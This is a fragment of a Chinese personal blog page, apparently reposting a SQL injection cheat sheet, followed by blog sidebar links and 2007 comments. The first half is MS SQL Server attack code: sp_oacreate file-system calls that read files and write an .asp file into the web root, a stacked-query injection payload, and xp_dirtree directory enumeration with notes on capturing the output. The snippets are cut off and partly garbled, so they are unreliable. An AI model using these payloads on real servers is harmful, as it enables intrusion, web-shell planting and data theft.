exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'ing.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong
to,us', 528
waitfor delay '00:00:05'
'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty
@o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel
servers are belong to us', 528 waitfor delay '00:00:05'--
xp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree 'c:\'
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表，这里建的表是和上面xp_dirtree相关连，字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree 'c:\'
只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,一步步达到我们想要的信息！

VITAS世界第一男高音

362010537@qq.com(Biiyth) — Sun, 28 Oct 2007 23:49:02 GMT

在大华...

362010537@qq.com(Biiyth) — Sun, 28 Oct 2007 09:02:44 GMT

算拉现在正烦.那天有心情再写出来,看下面的文章吧!挨!~

Biiyth

[转]灰太狼的十大优点

那个世界，那个人——读《悲惨世界》有感

金融危机的调查报告

默默的，守候在旁

[转]小屁孩

这就是团州人~

[转]生者不朽的爱 是死者不朽的名

分享]SQL注射语句的经典总结。不看后悔一辈子

VITAS世界第一男高音

在大华...

那个世界，那个人——读《悲惨世界》有感　　

[转]生者不朽的爱是死者不朽的名